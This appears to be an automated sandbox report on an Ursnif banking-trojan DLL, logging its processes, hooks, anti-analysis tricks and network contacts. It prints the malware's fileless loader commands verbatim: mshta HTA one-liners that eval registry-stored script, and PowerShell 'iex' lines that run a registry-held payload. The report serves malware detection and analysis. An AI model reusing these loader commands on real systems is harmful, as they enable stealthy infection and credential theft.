                      Source: gECym.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100021B40_2_100021B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F00B670_2_00F00B67
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F00B690_2_00F00B69
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001540 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_10001540
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100023D5 NtQueryVirtualMemory,0_2_100023D5
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                      Source: gECym.dllStatic PE information: invalid certificate
                      Source: gECym.dllVirustotal: Detection: 10%
                      Source: gECym.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\gECym.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\gECym.dll
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllUnregisterServer
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2376 CREDAT:17410 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllGetClassObject
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Kf7p='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kf7p).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Acbs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acbs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ns0e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ns0e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\gECym.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllUnregisterServerJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gECym.dll,DllGetClassObjectJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2376 CREDAT:17410 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\InProcServer32Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{3F2CDD13-31F2-11EC-90E5-ECF4BB570DC9}.dat
                      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF062D96AA82264A2D.TMP
                      Source: classification engineClassification label: mal100.troj.evad.winDLL@26/19@24/7
                      Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.ini
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts

                      Data Obfuscation:

                      barindex
                      Suspicious powershell command line foundShow sources
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn))
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100021A3 push ecx; ret 0_2_100021B3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002150 push ecx; ret 0_2_10002159
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F008B1 push dword ptr [esp+0Ch]; ret 0_2_00F008C5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F008B1 push dword ptr [esp+10h]; ret 0_2_00F0090B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F003B4 push dword ptr [ebp-00000284h]; ret 0_2_00F00423
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F00576 push dword ptr [ebp-00000284h]; ret 0_2_00F00724
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F00576 push dword ptr [ebp-0000028Ch]; ret 0_2_00F00778
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F00576 push edx; ret 0_2_00F007C6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F00576 push dword ptr [esp+10h]; ret 0_2_00F008B0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F00779 push edx; ret 0_2_00F007C6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F0053F push dword ptr [ebp-00000284h]; ret 0_2_00F00575
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F00725 push edx; ret 0_2_00F007C6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F00382 push dword ptr [ebp-00000284h]; ret 0_2_00F0053E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001753 LoadLibraryA,GetProcAddress,0_2_10001753
                      Source: gECym.dllStatic PE information: real checksum: 0x4a07a should be: 0x4445d
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\gECym.dll

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000009.00000003.668818796.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669066527.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.720146282.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669002058.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668792468.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696203622.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.668767287.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696328482.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682552775.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.729873849.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.751457455.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682707764.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682497297.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668983889.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682925882.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668839332.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.728388991.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682449280.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.729934950.0000000004EDC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669342603.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.726873336.0000000003A3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668597805.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696428988.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696293646.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.737533634.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668893514.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668698618.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.762064879.000000000532C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696353839.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696234648.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696265985.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696490210.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.761914135.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682640820.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682808858.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.683000420.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.668889642.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.731054718.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669161190.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.739495874.00000000058CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668637384.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669217152.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.739276832.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668670422.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.719599695.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 2908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4892, type: MEMORYSTR
                      Source: Yara matchFile source: 6.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.f30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.37194a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.37194a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.796706497.0000000000F30000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.563086752.00000000030D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.804704031.0000000003719000.00000004.00000040.sdmp, type: MEMORY
                      Hooks registry keys query functions (used to hide registry keys)Show sources
                      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
                      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
                      Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
                      Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
                      Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
                      Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
                      Source: explorer.exeEAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
                      Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4904Thread sleep count: 167 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4904Thread sleep time: -37408s >= -30000s
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4904Thread sleep count: 69 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4876Thread sleep time: -1773297476s >= -30000s
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4876Thread sleep count: 79 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4876Thread sleep count: 49 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4876Thread sleep count: 35 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4876Thread sleep count: 89 > 30
                      Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: loaddll32.exe, 00000000.00000002.800825641.000000000122E000.00000004.00000020.sdmp, regsvr32.exe, 00000003.00000003.751002703.000000000330F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001753 LoadLibraryA,GetProcAddress,0_2_10001753
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F008B1 mov eax, dword ptr fs:[00000030h]0_2_00F008B1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F00576 mov eax, dword ptr fs:[00000030h]0_2_00F00576
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F0099D mov eax, dword ptr fs:[00000030h]0_2_00F0099D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F007C8 mov eax, dword ptr fs:[00000030h]0_2_00F007C8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F0090C mov eax, dword ptr fs:[00000030h]0_2_00F0090C

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: aaaa.bar
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 31.220.111.98 187
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Kf7p='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kf7p).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Acbs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acbs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ns0e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ns0e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.802991988.00000000018A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.802991988.00000000018A0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.802991988.00000000018A0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: loaddll32.exe, 00000000.00000002.802991988.00000000018A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: loaddll32.exe, 00000000.00000002.802991988.00000000018A0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001E13 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_10001E13
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001EE5 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_10001EE5

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000009.00000003.668818796.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669066527.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.720146282.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669002058.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668792468.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696203622.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.668767287.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696328482.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682552775.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.729873849.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.751457455.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682707764.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682497297.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668983889.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682925882.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668839332.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.728388991.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682449280.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.729934950.0000000004EDC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669342603.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.726873336.0000000003A3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668597805.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696428988.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696293646.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.737533634.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668893514.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668698618.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.762064879.000000000532C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696353839.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696234648.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696265985.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696490210.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.761914135.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682640820.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682808858.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.683000420.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.668889642.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.731054718.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669161190.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
